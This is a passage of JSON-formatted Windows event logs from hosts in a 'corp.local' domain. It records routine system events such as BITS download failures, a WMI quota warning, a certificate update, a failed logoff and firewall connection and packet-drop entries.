ID:\t129097\r\n\tLayer Name:\t\tConnect\r\n\tLayer Run-Time ID:\t48","Category":"Filtering Platform Connection","Opcode":"Info","ProcessID":"1188","Application":"\\device\\harddiskvolume2\\windows\\system32\\svchost.exe","Direction":"%%14593","SourceAddress":"192.168.2.46","SourcePort":"51163","DestAddress":"45.64.115.163","DestPort":"80","Protocol":"6","FilterRTID":"129097","LayerName":"%%14611","LayerRTID":"48","RemoteUserID":"S-1-0-0","RemoteMachineID":"S-1-0-0","EventReceivedTime":"2021-08-24T18:42:52.324951+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-24T03:59:41.523918+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":61,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":2,"RecordNumber":4413,"ActivityID":"{CA6DB3DC-B6B4-4857-A175-060860AE13A2}","ExecutionProcessID":348,"ExecutionThreadID":2324,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"BITS stopped transferring the SpeechModelDownloadJob transfer job that is associated with the https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xml URL. The status code is 0x80072EE7.","Opcode":"Stop","transferId":"{ca6db3dc-b6b4-4857-a175-060860ae13a2}","name":"SpeechModelDownloadJob","Id":"{fac5e752-7af3-45df-95c6-302e0fae5b92}","url":"https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xml","hr":"2147954407","fileTime":"1601-01-01T00:00:00.000000000Z","fileLength":"18446744073709551615","bytesTotal":"18446744073709551615","bytesTransferred":"0","peerProtocolFlags":"0","bytesTransferredFromPeer":"0","AdditionalInfoHr":"0","PeerContextInfo":"0","bandwidthLimit":"18446744073709551615","ignoreBandwidthLimitsOnLan":"false","EventReceivedTime":"2021-08-24T03:59:42.470303+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-11T11:47:25.437659+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":5612,"SourceName":"Microsoft-Windows-WMI","ProviderGuid":"{1EDEEE53-0AFE-4609-B846-D8C0B2075B1F}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":115635,"ExecutionProcessID":2124,"ExecutionThreadID":2156,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows Management Instrumentation has stopped WMIPRVSE.EXE because a quota reached a warning value. Quota: HandleCount Value: 4098 Maximum value: 4096 WMIPRVSE PID: 2124 Providers hosted in this process: %systemroot%\\system32\\wbem\\wmiprov.dll, C:\\Windows\\System32\\wbem\\WmiPerfClass.dll","Opcode":"Info","UserData":"<data_0x8000003F xmlns='http://manifests.microsoft.com/win/2006/windows/WMI'><QuotaName>HandleCount</QuotaName><QuotaValue>4098</QuotaValue><QuotaThreshold>4096</QuotaThreshold><ProcessID>2124</ProcessID><ProvidersInHost>%systemroot%\\system32\\wbem\\wmiprov.dll, C:\\Windows\\System32\\wbem\\WmiPerfClass.dll</ProvidersInHost></data_0x8000003F>","EventReceivedTime":"2021-08-11T11:47:27.297016+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-10T00:00:24.987964+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":16385,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":24011,"ExecutionProcessID":348,"ExecutionThreadID":3188,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"While canceling job \"Edge Component Updater\", BITS was unable to remove some temporary files. To recover disk space, delete the files listed below. The job ID was {fc0a2758-93c2-4d16-9d95-9a09673ca5d4}. C:\\Users\\lau\\AppData\\Local\\Temp\\edge_BITS_7068_1127678655\\BIT5FCC.tmp\n","Opcode":"Info","Id":"{fc0a2758-93c2-4d16-9d95-9a09673ca5d4}","Title":"Edge Component Updater","FileList":" C:\\Users\\lau\\AppData\\Local\\Temp\\edge_BITS_7068_1127678655\\BIT5FCC.tmp\n","EventReceivedTime":"2021-08-10T00:00:25.659297+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-04T13:22:34.446811+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4004,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":65543,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Windows logon process has failed to terminate the currently logged on user's processes.","EventData.Binary":"E303000000000100","EventReceivedTime":"2021-08-04T13:22:34.804207+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-04T13:22:34.446811+05:45","Hostname":"IT02.corp.local","Keywords":"9259400833873739776","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1077,"SourceName":"User32","ProviderGuid":"{B0AA8734-56F7-41CC-B2F4-DE228E98B946}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67793,"ExecutionProcessID":10116,"ExecutionThreadID":8884,"Channel":"System","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"The attempt by user CORP\\Leo to logoff computer IT02 failed","param1":"IT02","param2":"CORP\\Leo","EventReceivedTime":"2021-08-04T13:22:37.054068+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-03T16:46:07.622251+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4097,"SourceName":"Microsoft-Windows-CAPI2","ProviderGuid":"{5BBCA4A8-B209-48DC-A8C7-B23D3E5216FB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":24262,"ExecutionProcessID":2488,"ExecutionThreadID":956,"Channel":"Application","Message":"Successful auto update of third-party root certificate:: Subject: <CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US> Sha1 thumbprint: <DDFB16CD4931C973A2037D3FC83A4D7D775D05E4>.","Opcode":"Info","EventData":"<Data>CN=DigiCert Trusted Root G4, OU=www.digicert.com, O=DigiCert Inc, C=US</Data><Data>DDFB16CD4931C973A2037D3FC83A4D7D775D05E4</Data>","EventReceivedTime":"2021-08-03T16:46:08.498909+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-03T14:49:32.779696+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4659,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12800,"OpcodeValue":0,"RecordNumber":40679545,"ExecutionProcessID":4,"ExecutionThreadID":6784,"Channel":"Security","Message":"A handle to an object was requested with intent to delete.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT03$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\tSecurity\r\n\tObject Type:\tFile\r\n\tObject Name:\tC:\\Windows\\WinSxS\\Temp\\PendingDeletes\\54c719934688d7016001000058073418.msvcr120_clr0400.dll\r\n\tHandle ID:\t0x0\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x758\r\n\r\nAccess Request Information:\r\n\tTransaction ID:\t{706f1550-f438-11eb-b4cc-000c29d3d841}\r\n\tAccesses:\tDELETE\r\n\t\t\t\t\r\n\tAccess Mask:\t0x10000\r\n\tPrivileges Used for Access Check:\t-","Category":"File System","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT03$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security","ObjectType":"File","ObjectName":"C:\\Windows\\WinSxS\\Temp\\PendingDeletes\\54c719934688d7016001000058073418.msvcr120_clr0400.dll","HandleId":"0x0","TransactionId":"{706f1550-f438-11eb-b4cc-000c29d3d841}","AccessList":"%%1537\r\n\t\t\t\t","AccessMask":"0x10000","PrivilegeList":"-","ProcessId":"0x758","EventReceivedTime":"2021-08-03T14:49:33.556088+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-04T01:07:08.669906+05:45","Hostname":"IT01.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":5152,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12809,"OpcodeValue":0,"RecordNumber":434230,"ExecutionProcessID":4,"ExecutionThreadID":4920,"Channel":"Security","Message":"The Windows Filtering Platform has blocked a packet.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t0\r\n\tApplication Name:\t-\r\n\r\nNetwork Information:\r\n\tDirection:\t\tInbound\r\n\tSource Address:\t\t192.168.2.47\r\n\tSource Port:\t\t389\r\n\tDestination Address:\t192.168.2.46\r\n\tDestination Port:\t\t54734\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t108993\r\n\tLayer Name:\t\tTransport\r\n\tLayer Run-Time ID:\t13","Category":"Filtering Platform Packet Drop","Opcode":"Info","ProcessId":"0","Application":"-","Direction":"%%14592","SourceAddress":"192.168.2.47","SourcePort":"389","DestAddress":"192.168.2.46","DestPort":"54734","Protocol":"6","FilterRTID":"108993","LayerName":"%%14597","LayerRTID":"13","EventReceivedTime":"2021-08-04T01:07:10.438303+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}